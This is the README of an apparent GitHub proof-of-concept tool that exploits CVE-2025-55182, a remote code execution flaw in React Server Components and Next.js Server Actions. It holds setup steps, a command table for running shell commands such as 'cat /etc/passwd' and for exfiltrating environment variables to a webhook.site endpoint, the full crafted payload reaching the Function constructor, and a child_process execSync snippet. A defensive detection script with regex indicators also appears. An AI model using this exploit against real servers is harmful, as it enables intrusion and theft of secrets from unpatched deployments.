NathanJ60/react2shell-interactive

React2Shell - CVE-2025-55182 Interactive PoC

Interactive shell for exploiting CVE-2025-55182, a Remote Code Execution vulnerability in React Server Components.

Disclaimer

This tool is provided for EDUCATIONAL and AUTHORIZED SECURITY TESTING purposes only.

  • Only use on systems you own or have explicit written permission to test
  • Unauthorized access to computer systems is illegal
  • The author is not responsible for any misuse of this tool
  • This is a proof-of-concept for security research and awareness

Vulnerability Overview

CVE-2025-55182 affects React Server Components (RSC) in:

  • Next.js < 15.1.7, < 14.2.29, < 13.5.9
  • Waku (various versions)

The vulnerability allows Remote Code Execution (RCE) through malicious payloads sent to Server Actions.

How It Works

  1. The RSC protocol uses $@x syntax to reference internal Chunk objects
  2. JavaScript promise resolution automatically unwraps any object that has a .then() method (Promise-like)
  3. The attacker crafts a malicious payload with controlled _response, _formData, and _prefix properties
  4. Through these properties, the attacker can reach the Function constructor via prototype chain traversal
  5. This allows arbitrary JavaScript execution on the server

$3:constructor:constructor → Function constructor → RCE

Installation

git clone https://github.com/NathanJ60/react2shell-interactive.git
cd react2shell-interactive
npm install

Configuration

Edit exploit.js and update these values:

const TARGET_URL = 'http://localhost:3000/'          // Vulnerable Next.js server
const WEBHOOK_URL = 'https://webhook.site/YOUR-ID'   // Your webhook URL

Get a free webhook at: https://webhook.site

Usage

node exploit.js

Commands

Command      Description
!test        Test if exploit works (sends confirmation to webhook)
!env         Exfiltrate environment variables (process.env)
!js <code>   Execute custom JavaScript
!help        Show help
!exit        Exit
<command>    Execute shell command (e.g., whoami, ls, cat /etc/passwd)

Example Session

react2shell> !test
[+] Sent! Check webhook

react2shell> whoami
[+] Sent: whoami

react2shell> ls -la
[+] Sent: ls -la

react2shell> !env
[+] Sent! Check webhook for env vars

Results appear on your webhook, not in the terminal.

Technical Details

Payload Structure

{
    '0': '$1',
    '1': {
        'status': 'resolved_model',
        'reason': 0,
        '_response': '$4',
        'value': '{"then":"$3:map","0":{"then":"$B3"},"length":1}',
        'then': '$2:then'
    },
    '2': '$@3',
    '3': [],
    '4': {
        '_prefix': '<JAVASCRIPT_CODE>//',
        '_formData': { 'get': '$3:constructor:constructor' },
        '_chunks': '$2:_response:_chunks'
    }
}

Execution Flow

  1. Payload is sent as multipart form data with a next-action header
  2. React Flight parser processes the chunks
  3. $@3 creates a Chunk reference
  4. $3:constructor:constructor traverses to Function
  5. _prefix content is passed to Function() and executed
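
A defensive check built on the payload structure and execution flow above, as an added example that is not part of this repository: it scores the body of a request carrying a next-action header against the markers this README describes. The function names, indicator ids, weights and threshold are assumptions of the example, and both sample bodies are constructed.

```javascript
// Added example, not part of the PoC repository. Indicator ids, weights and
// the threshold are assumptions of this example; tune them on real traffic.
const INDICATORS = [
  // Reference path that walks to the Function constructor
  { id: 'ctor-chain', weight: 5, re: /\$[0-9a-f]+(?::[\w$]+)*:constructor:constructor/i },
  // Client-supplied object posing as an already-resolved Chunk
  { id: 'forged-chunk', weight: 3, re: /["']status["']\s*:\s*["']resolved_model["']/ },
  // Parser-internal property names arriving from the client
  { id: 'internal-key', weight: 2, re: /["']_(?:response|formData|prefix|chunks)["']\s*:/ },
  // A "then" property bound to a reference (thenable unwrapping)
  { id: 'then-ref', weight: 2, re: /["']then["']\s*:\s*["']\$/ },
  // Raw Chunk reference ($@x); weak signal on its own
  { id: 'chunk-ref', weight: 1, re: /["']\$@[0-9a-f]+["']/i },
];
const BLOCK_THRESHOLD = 5;

// Case-insensitive header lookup on a plain headers object.
function headerValue(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? undefined : String(headers[key]);
}

function inspectServerAction(headers, body) {
  if (headerValue(headers, 'next-action') === undefined) {
    return { serverAction: false, score: 0, hits: [], verdict: 'ignore' };
  }
  // Nested JSON strings arrive with escaped quotes; unescape before matching.
  const text = String(body).replace(/\\(["'])/g, '$1');
  const hits = INDICATORS.filter((i) => i.re.test(text));
  const score = hits.reduce((sum, i) => sum + i.weight, 0);
  const verdict = score >= BLOCK_THRESHOLD ? 'block' : score > 0 ? 'review' : 'allow';
  return { serverAction: true, score, hits: hits.map((i) => i.id), verdict };
}

// Constructed samples: a fragment of the README's payload structure (with its
// placeholder, no code) and an ordinary form submission.
const SUSPICIOUS_BODY =
  '{"1":{"status":"resolved_model","reason":0,"_response":"$4",' +
  '"value":"{\\"then\\":\\"$3:map\\"}","then":"$2:then"},"2":"$@3",' +
  '"4":{"_prefix":"<JAVASCRIPT_CODE>//","_formData":{"get":"$3:constructor:constructor"}}}';
const BENIGN_BODY =
  '--b\r\nContent-Disposition: form-data; name="1_email"\r\n\r\nuser@example.com\r\n' +
  '--b\r\nContent-Disposition: form-data; name="0"\r\n\r\n["$K1"]\r\n--b--';

console.log(inspectServerAction({ 'Next-Action': 'constructed-id' }, SUSPICIOUS_BODY));
console.log(inspectServerAction({ 'next-action': 'constructed-id' }, BENIGN_BODY));
```

Body pattern matching like this is suited to logging and triage in front of an application; it does not replace upgrading to a patched release.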

Notes for Next.js 15+

  • Uses ESM modules, so require() is not available
  • Use dynamic import() instead:
    import("child_process").then(cp => cp.execSync("whoami"))

Patched Versions

Update to these versions to fix the vulnerability:

  • Next.js >= 15.1.7
  • Next.js >= 14.2.29
  • Next.js >= 13.5.9

License

MIT License - For educational purposes only.

Author

Security Research PoC - Use responsibly.
